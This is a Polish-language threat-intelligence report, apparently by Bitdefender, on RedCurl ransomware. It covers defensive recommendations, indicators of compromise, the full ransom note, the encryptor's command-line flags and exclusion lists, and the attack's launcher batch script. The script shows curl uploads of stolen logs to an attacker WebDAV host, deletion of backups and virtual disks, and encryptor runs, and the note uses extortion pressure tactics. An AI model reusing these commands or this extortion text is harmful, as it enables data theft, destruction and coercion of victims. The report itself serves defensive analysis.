4. Zwiększ ochronę i odporność danych: Podczas gdy kopie zapasowe są często uważane za podstawową obronę przed oprogramowaniem ransomware, są one zazwyczaj mniej skuteczne niż zakładano ze względu na złośliwe ataki. Wdrażaj niezmienne kopie zapasowe, odizolowane od sieci produkcyjnej i regularnie testuj procedury odzyskiwania. Zachowaj ostrożność w przypadku rozwiązań kopii zapasowych, które polegają na kopiach woluminów w tle, ponieważ są one często atakowane i usuwane przez oprogramowanie ransomware, o czym świadczy domyślne usuwanie woluminów w tle przez RedCurl. Szyfruj poufne dane w stanie spoczynku i w ruchu, aby zminimalizować skutki naruszenia danych.

5. Zaawansowana inteligencja zagrożeń: Odpowiednie rozwiązania w zakresie inteligencji zagrożeń mogą zapewnić krytyczne informacje o atakach. Bitdefender IntelliZone konsoliduje wszystkie informacje, które zebraliśmy o operacjach RedCurl. Jeśli masz już konto Intellizone, możesz znaleźć  dodatkowe informacje o strukturze w Threat ID BD9ys7c9na.

Wdrażając te zalecenia, organizacje mogą wzmocnić swoje mechanizmy obronne i lepiej zabezpieczyć się przed ciągle zmieniającymi się zagrożeniami, jakie stwarzają wyrafinowani przeciwnicy cybernetyczni.

Wskaźniki zagrożenia

Files

• (%AppData%\Roaming\BrowserSpec\BrowserSpec_<nazwa hosta w base64>.dll) – a806df529a111fb453175ecdcb230d96
• (%AppData%\Roaming\temp95\lzp.py) – f19542732c33f1b908365df02a86105c
• (C:\ProgramData\ a744bef51.bat) – ca1b05b97e934511a76a744b53b8eb92
• (C:\ProgramData\a753506f51fc.bat) – Brak
• (C:\ProgramData\rbcw.exe)- 27927a73b8273dc796ddfc309ec8ecaf
• (C:\ProgramData \rn.bat) – 6495356afd05dbf8661af13ef72ab887
• (C:\ProgramData\rnfin.bat) – c41957f965f8c38b6cedf44b62b09298
• (C:\ProgramData\rnm.bat) – 09735d305b7d6f071173fe3b62b46d9e
• (C:\ProgramData\ unideq.dll) – 4154c3553656e94575aeb7183969bfa0
• (C:\ProgramData\unimac.exe) – 5f2c5f7620b74d183e206817b723b555
• (C:\ProgramData\ unireq.exe) – 8d56ac580c06baac327613202fdbf5eb
• (C:\ProgramData\unisap.dll) – add1bfb2d4b4ad083dcee40d61a12780
• (C:\ProgramData\7za.exe)- fde874e8d442e3f0469b3d2f86a45739)
• (C:\ProgramData\term.exe) – bc469bcdb585d8e6576fc664a6404a82, ab2d6846430b8ea18fc08cb7804fce99, e58e5afa9a94ba474e465dbf919d2c51
• (C:\ProgramData\term.sys) – Brak
• (C:\temp\chisel-garble-win-x64-v2.0_upx.exe) – fd3fd2f6cde9e38e92433c152892c03d
• (C:\Windows\system32\gdiplus.exe) – d00c86ea42958f919c702a9a416a24ce
• (CV APPLICANT 7802-91542.SCR) – 9f7b1afce9c8c7d9282c5e791c69e369

Adresy URL

• hxxps://my[.]powerfolder[.]com/webdav/utils/elzp[.]txt
• hxxps://mia[.]nl[.]tab[.]digital/remote[.]php/dav/files/
  
  

  Zaplanowane zadania

• \\BrowserSpec\\BrowserSpec_<hostname in base64>

Załączniki

Notatka o okupie

PERSONAL_ID: 329BCF07-85F2-49A7-97C3-5D7DA04FB9E3

>>>>> Twoje dane zostały skradzione i zaszyfrowane.

Jeśli nie zapłacisz okupu, dane zostaną opublikowane na naszych stronach TOR darknet. Pamiętaj, że gdy tylko Twoje dane pojawią się na naszej stronie z wyciekami, mogą zostać kupione przez Twoich konkurentów w każdej chwili, więc nie wahaj się długo. Im szybciej zapłacisz okup, tym szybciej Twoja firma będzie bezpieczna.

>>>>> Jakie zagrożenia wiążą się z wyciekiem danych Twojej firmy?

Przede wszystkim otrzymasz grzywny od rządu, takie jak RODO i wiele innych, możesz zostać pozwany przez klientów swojej firmy za ujawnienie poufnych informacji. Twoje ujawnione dane zostaną wykorzystane przez wszystkich hakerów na świecie do różnych nieprzyjemnych rzeczy. Na przykład inżynieria społeczna, dane osobowe Twoich pracowników mogą zostać wykorzystane do ponownej infiltracji Twojej firmy. Dane bankowe i paszporty mogą zostać wykorzystane do tworzenia kont bankowych i portfeli internetowych, za pomocą których będą prane pieniądze pochodzące z przestępstwa. Podczas kolejnej podróży wakacyjnej będziesz musiał wyjaśnić FBI, skąd masz miliony dolarów skradzionej kryptowaluty przelanej za pośrednictwem Twoich kont na giełdach kryptowalut. Twoje dane osobowe mogą zostać wykorzystane do udzielania pożyczek lub kupowania urządzeń. Później będziesz musiał udowodnić w sądzie, że to nie Ty zaciągnąłeś pożyczkę i spłaciłeś pożyczkę kogoś innego. Twoi konkurenci mogą wykorzystać skradzione informacje do kradzieży technologii lub ulepszenia swoich procesów, Twoich metod pracy, dostawców, inwestorów, sponsorów, pracowników, wszystko to będzie w domenie publicznej. Nie będziesz zadowolony, jeśli Twoi konkurenci zwabią Twoich pracowników do innych firm oferujących lepsze wynagrodzenia, prawda? Twoi konkurenci wykorzystają Twoje informacje przeciwko Tobie. Na przykład poszukaj naruszeń podatkowych w dokumentach finansowych lub jakichkolwiek innych naruszeń, więc będziesz musiał zamknąć swoją firmę. Według statystyk, dwie trzecie małych i średnich firm zamyka się w ciągu pół roku po naruszeniu danych. Będziesz musiał znaleźć i naprawić luki w zabezpieczeniach swojej sieci, pracować z klientami dotkniętymi wyciekiem danych. Wszystkie te procedury są bardzo kosztowne, które mogą przekroczyć koszt wykupu ransomware o czynnik setny. Znacznie łatwiej, taniej i szybciej jest zapłacić nam okup. Cóż, i co najważniejsze, poniesiesz stratę reputacyjną, budowałeś swoją firmę przez wiele lat, a teraz Twoja reputacja zostanie zniszczona.

>>>>> Jak odszyfrować dane?

Skontaktuj się z naszym zespołem wsparcia przez e-mail: edgypsin@proton.me (wpisz swój PERSONAL_ID w polu SUBJECT) i poczekaj na odpowiedź, gwarantujemy odpowiedź. Czasami będziesz musiał trochę poczekać na naszą odpowiedź, ponieważ mamy dużo pracy i atakujemy setki firm na całym świecie.

>>>>> Jaką masz gwarancję, że Cię nie oszukamy?

Jesteśmy jedną z najsłynniejszych grup ransomware, nic nie jest ważniejsze niż nasza reputacja. Nie jesteśmy grupą motywowaną politycznie i nie chcemy niczego więcej niż pieniędzy. Jeśli zapłacisz, dostarczymy Ci oprogramowanie do odszyfrowywania. Po zapłaceniu okupu szybko odzyskasz swoje pliki i unikniesz dalszych strat. Spójrz na tę sytuację po prostu jak na płatne szkolenie dla administratorów systemu, ponieważ to z powodu nieprawidłowej konfiguracji sieci korporacyjnej mogliśmy Cię zaatakować. Nasze usługi pentestów powinny być płatne tak samo, jak płacisz pensje administratorom systemu. Pogódź się z tym i zapłać za to.

>>>>> Ostrzeżenie! Nie usuwaj ani nie modyfikuj zaszyfrowanych plików, spowoduje to problemy z odszyfrowaniem plików!

>>>> Bardzo ważne! Dla tych, którzy mają cyberubezpieczenie od ataków ransomware.

Firmy ubezpieczeniowe wymagają, abyś zachował informacje o swoim ubezpieczeniu w tajemnicy, co oznacza, że nigdy nie zapłacą maksymalnej kwoty określonej w umowie lub nie zapłacą nic, co zakłóci negocjacje. Firma ubezpieczeniowa będzie próbowała przerwać negocjacje w każdy możliwy sposób, aby później móc argumentować, że zostaniesz pozbawiony ochrony, ponieważ Twoje ubezpieczenie nie obejmuje kwoty okupu. Na przykład Twoja firma jest ubezpieczona na 10 milionów dolarów, podczas negocjacji z agentem ubezpieczeniowym na temat okupu zaoferuje nam najniższą możliwą kwotę, na przykład 100 tysięcy dolarów, odrzucimy marną kwotę i poprosimy na przykład o kwotę 15 milionów dolarów, agent ubezpieczeniowy nigdy nie zaoferuje nam najwyższego progu Twojego ubezpieczenia wynoszącego 10 milionów dolarów. Zrobi wszystko, aby przerwać negocjacje i odmówi całkowitej wypłaty i zostawi Cię samego z Twoim problemem. Gdybyś powiedział nam anonimowo, że Twoja firma jest ubezpieczona na 10 milionów dolarów i inne ważne szczegóły dotyczące ubezpieczenia, nie żądalibyśmy więcej niż 10 milionów dolarów w korespondencji z agentem ubezpieczeniowym. W ten sposób unikniesz wycieku i odszyfrujesz swoje informacje. Ale ponieważ podstępny agent ubezpieczeniowy celowo negocjuje, aby nie zapłacić odszkodowania, w tej sytuacji wygrywa tylko firma ubezpieczeniowa. Aby tego wszystkiego uniknąć i uzyskać pieniądze z ubezpieczenia, koniecznie poinformuj nas anonimowo o dostępności i warunkach ubezpieczenia, jest to korzystne zarówno dla Ciebie, jak i dla nas, ale nie dla firmy ubezpieczeniowej. Biedni multimilionerzy nie będą głodować i nie staną się biedniejsi od wypłaty maksymalnej kwoty określonej w umowie, ponieważ wszyscy wiedzą, że umowa jest droższa od pieniędzy, więc pozwól im spełnić warunki określone w Twojej umowie ubezpieczeniowej, dzięki naszej interakcji.

>>>>> Jeśli nie zapłacisz okupu, zaatakujemy Twoją firmę ponownie w przyszłości.

Tekst został przetłumaczony z języka angielskiego z próbą uwzględnienia nienaturalnego języka, który stosowali cyberprzestępcy. Jeśli chcesz poznać oryginalną treść wiadomości, to sprawdź ten link.

Argumenty rbcw.exe

To dłuższy opis, który obejmuje wiele wierszy i prawdopodobnie zawiera przykłady i użycie Twojej aplikacji.

Na przykład:

Cobra to biblioteka CLI dla Go, która wzmacnia aplikacje. Ta aplikacja jest narzędziem do generowania potrzebnych plików, aby szybko utworzyć aplikację Cobra.

Stosowanie:

qwc [flagi]

Flagi:

• (–block-size) ciąg Rozmiar bloku AES (domyślnie „1M”)
• (–chacha) Użyj algorytmu ChaCha20
• (–dryrun) Nie modyfikuj niczego
• (–excludeVM string) Wyklucz maszyny wirtualne (lista plików csv)
• (–folder stringArray) Foldery do przeszukiwania plików (domyślnie [wszystkie])
• (–full-enc-less string) Pełne szyfrowanie plików mniejszych niż (domyślnie „50M”)
• (-h, –help) Pomoc dla qwc
• (–hv) Szyfruj maszyny wirtualne HyperV
• (-i, –info) Wyświetl informacje o systemie
• (-k, –key string) Zmienne klucza
• (–kill) Zakończ proces maszyny wirtualnej
• (–log string) Plik dziennika
• (–maxsize string) Klucz zmiennej (domyślnie „0”)
• (–minsize string) Klucz zmiennych (domyślnie „0”)
• (–nosd) Nie dokonuj samousunięcia
• (–noshadowdelete) Nie usuwaj kopii w tle
• (–skip-count int) Pomiń liczbę bloków (domyślnie 5)
• (–threads int) Liczba wątków Cryptor (domyślnie 10)
• (–turnoff) Wyłącz maszyny wirtualne HyperV (domyślnie true)

Może być również dłuższy opis, który obejmuje wiele wierszy i prawdopodobnie zawiera przykłady i użycie użycia Twojej aplikacji.

Na przykład:

Cobra to biblioteka CLI dla języka Go, która wzbogaca aplikacje.

Stosowanie:

qwc [flagi]

Flagi:

• (–block-size string) Rozmiar bloku AES (domyślnie „1M”)
• (–chacha) Użyj algorytmu ChaCha20
• (–dryrun) Nie modyfikuj niczego
• (–excludeVM string) Wyklucz maszyny wirtualne (lista plików csv)
• (–folder stringArray) Foldery do przeszukiwania plików (domyślnie [wszystkie])
• (–full-enc-less string) Pełne szyfrowanie plików mniejszych niż (domyślnie „50M”)
• (-h, –help) Pomoc dla qwc
• (–hv) Szyfruj maszyny wirtualne HyperV
• (-i, –info) Wyświetl informacje o systemie
• (-k, –key string) Zmienne klucza
• (–kill) Zakończ proces maszyny wirtualnej
• (–log string) Plik dziennika
• (–maxsize string) Klucz zmiennej (domyślnie „0”)
• (–minsize string) Klucz zmiennych (domyślnie „0”)
• (–nosd) Nie usuwaj sam siebie
• (–noshadowdelete) Nie usuwaj kopii w tle
• (–skip-count int) Pomiń liczbę bloków (domyślnie 5)
• (–threads int) Liczba wątków Cryptor (domyślnie 10)
• (–turnoff) Wyłącz maszyny wirtualne HyperV (domyślnie true)
• (–verbose) Użyj szczegółowego formatu wyjściowego

Zasady wykluczenia

Konfiguracja zawiera również wyjątki dla katalogów i plików.

Wykluczone katalogi

• (C:\\Windows\\)
• (C:\\Program Files\\Common Files\\)
• (C:\\Program Files\\Windows NT\\)
• (C:\\Program Files\\Windows Defender)
• (C:\\Program Files\\Malwarebytes\\)
• (C:\\Program Files\\VIPRE Business Agent\\)
• (C:\\Program Files\\WindowsApps\\)
• (C:\\Program Files\\Windows Media Player\\)
• (C:\\Program Files\\Update Services\\)
• (C:\\Program Files\\Microsoft\.NET\\)
• (C:\\Program Files\\Internet Explorer\\)
• (C:\\Program Files\\Bitdefender)
• (C:\\Program Files\\WindowsPowerShell\\)
• (C:\\Program Files \(x86\)\\Common Files\\)
• (C:\\Program Files \(x86\)\\Internet Explorer\\)
• (C:\\Program Files \(x86\)\\Microsoft\.NET\\)
• (C:\\Program Files \(x86\)\\Microsoft\\Edge\\)
• (C:\\Program Files \(x86\)\\Windows Media\\)
• (C:\\Program Files \(x86\)\\Windows NT\\)
• (C:\\Program Files \(x86\)\\WindowsPowerShell\\)
• (C:\\ProgramData\\)
• (\\AppData\\Local\\)
• (C:\\Program Files \(x86\)\\Windows Defender)
• (Cynet Ransom Protection)
• (C:\\Program Files \(x86\)\\Windows Media Player\\)
• (C:\\Program Files \(x86\)\\SentinelOne\\)
• (C:\\Program Files\\SentinelOne\\)
• (\\AppData\\Roaming\\)
• (C:\\Windows\.old\\)
• (System Volume Information)
• (:\\\$)
• (\\Users\\\$)
• (\\\$\w{32}\\)
• (\\afterSentDocuments\\)
• Wykluczone pliki
• (.exe$)
• (.dll$)
• (.sys$)
• (.ocx$)
• (.dat$)
• (.lnk$)
• (.locked$)
• (.randombits$)
• (NTUSER.DAT)
• (DumpStack.log)
• (bootmgr$)
• 
  (!!!how_to_unlock_randombits_files.txt$)
• Skrypt uruchamiający
• (IF /I %~1 == –pass (set tpass=%2) ELSE GOTO stop)
• (IF /I %~3 == –main (set tmain=%4) ELSE GOTO stop)
• (IF /I %~5 == –key (set tkey=%6) ELSE GOTO stop)
• (set slog=<redacted>)
• (set spass=<redacted>)
• (set ppass=<redacted>)
• (set davstr=hxxps://mia[.]nl[.]tab[.]digital/remote[.]php/dav/files/<redacted>)
• (set davfld=LOGS)
• (if exist „C:\Program Files\PowerShell\7\pwsh.exe” (set pwsh=pwsh.exe) ELSE (set pwsh=powershell.exe))
• (set wdir=%ALLUSERSPROFILE%)
• (set tdir=temp_3a3352baf)
• (cd %wdir%)
• (mkdir %tdir%)
• (sc stop Term)
• (sc delete Term)
• (tasklist>>%tdir%\%computername%_main.log 2>&1)
• (echo =======>>%tdir%\%computername%_main.log 2>&1)
• (echo =======>>%tdir%\%computername%_main.log 2>&1)
• (start „” /D %wdir% cmd.exe /c %wdir%\term.exe)
• (timeout /T 20)
• (ver > nul)
• (tasklist /fi „imagename eq term.exe” | findstr /B /I /C:”term.exe” >NUL)
• (IF ERRORLEVEL 1 (start cmd.exe /c %wdir%\term.exe))
• (echo =======>>%tdir%\%computername%_main.log 2>&1)
• (echo RESTART_TERM>>%tdir%\%computername%_main.log 2>&1)
• (echo =======>>%tdir%\%computername%_main.log 2>&1))
• (tasklist>>%tdir%\%computername%_main.log 2>&1)
• (echo =======>>%tdir%\%computername%_main.log 2>&1)
• (echo =======>>%tdir%\%computername%_main.log 2>&1)
• (wmic path win32_process get)
• (Caption,Processid,Commandline>>%tdir%\%computername%_main.log 2>&1)
• (echo =======>>%tdir%\%computername%_main.log 2>&1)
• (echo =======>>%tdir%\%computername%_main.log 2>&1)
• (wmic logicaldisk get description,name,Size,FreeSpace>>%tdir%\%computername%_main.log 2>&1)
• (::%pwsh% -nop -c „$MCFP = New-Object -ComObject)
• (MSXML2.XMLHTTP;$MCFP.Open(’PUT’,$env:davstr+’/’+$env:davfld+’/RUN/’+$env:computername+’.tmp’, $False, $env:slog, $env:spass);$MCFP.Send();”)
• (echo >%wdir%\a001.tmp)
• (C:\ProgramData\curl.exe -T %wdir%\a001.tmp -u %slog%:%spass% %davstr%/%davfld%/RUN/%computername%.tmp)
  del /f /q %wdir%\a001.tmp
• (::DELETE)
• (if %computername%==<HOSTNAME1> (rd /S /Q „G:\backup” rd /S /Q „G:\backup images”)
• (del /F /Q „G:\*.vhdx”)
• (rd /S /Q „J:\Backup”)
• (rd /S /Q „J:\Storage”)
• (if %computername%==<HOSTNAME2> (del /F /Q „D:\<redacted>\Virtual Hard Disks\disk1.vhdx”)
• (del /F /Q „D:\<redacted>\Virtual Hard Disks\disk2.vhdx”)
• (del /F /Q „D:\<redacted>\<redacted>\Virtual Hard Disks\*.*”)
• (del /F /Q „D:\<redacted>\old\*.*”)
• (del /F /Q „E:\<redacted>\Virtual Hard Disks\d_drive.vhdx”)
• (del /F /Q „E:\<redacted>\Virtual Hard Disks\<redacted>.vhdx”)
• (del /F /Q „E:\<redacted>\Virtual Hard Disks\trans_log.vhdx”)
• (del /F /Q „E:\<user>\<redacted>\Virtual Hard Disks\d_drive.vhdx”)
• (del /F /Q „E:\<user>\<redacted>\Virtual Hard Disks\<redacted>.vhdx”)
• (del /F /Q „E:\<user>\<redacted>\Virtual Hard Disks\trans_log.vhdx”)
• (del /F /Q „F:\backup\*.*”)
• (rd /S /Q „F:\backup\”))
• (::DELETE)
• (::RBC)
• (C:\ProgramData\7za.exe x -aoa -p%tpass%)
• (C:\ProgramData\%tmain%2.tmp)
• (rbcw.exe –hv –excludeVM „wingate<subnet1>,wingate,wingate<subnet2>” –key %tkey% –nosd >%tdir%\%computername%_rbcw_hv_1.log 2>&1)
• (rbcw.exe –hv –excludeVM „wingate<subnet1>,wingate,wingate<subnet2>” –key %tkey% –nosd >%tdir%\%computername%_rbcw_hv_2.log 2>&1)
• (del /f /q C:\Windows\Temp\rnl.tmp)
• (C:\ProgramData\7za.exe a -p%ppass% -mhe=on -y C:\Windows\Temp\rnl.tmp %tdir%)
• (C:\ProgramData\curl.exe -T C:\Windows\Temp\rnl.tmp -u %slog%:%spass% %davstr%/%davfld%/RES/%computername%_01_%random%.tmp)
• (rbcw.exe –key %tkey% –nosd >%tdir%\%computername%_rbcw_1.log 2>&1)
• (rbcw.exe –key %tkey% >%tdir%\%computername%_rbcw_2.log 2>&1)
• (::RBC)
• (del /f /q C:\Windows\Temp\rnl.tmp)
• (C:\ProgramData\7za.exe a -p%ppass% -mhe=on -sdel -y)
• (C:\Windows\Temp\rnl.tmp %tdir%)
• (C:\ProgramData\curl.exe -T C:\Windows\Temp\rnl.tmp -u %slog%:%spass% %davstr%/%davfld%/RES/%computername%_02_%random%.tmp)
• (C:\ProgramData\7za.exe x -aoa -p%tpass% C:\ProgramData\%tmain%3.tmp)
• (start cmd.exe /c %wdir%\rnfin.bat)
• (taskkill /IM term.exe /F)
• (sc stop Term)
• 
  (sc delete Term)
• (del /F /Q term.exe)
• (del /F /Q term.sys)
• (del /F /Q rbcw.exe)
• (del /F /Q 7za.exe)
• (del /F /Q curl.exe)
• (::del /F /Q C:\Windows\Temp\rnl.tmp)
• (del /F /Q %tmain%.tmp)
• (del /F /Q %tmain%2.tmp)
• (del /F /Q %tmain%3.tmp)
• (rd /S /Q %tdir%)
• (:stop)
• (del %0)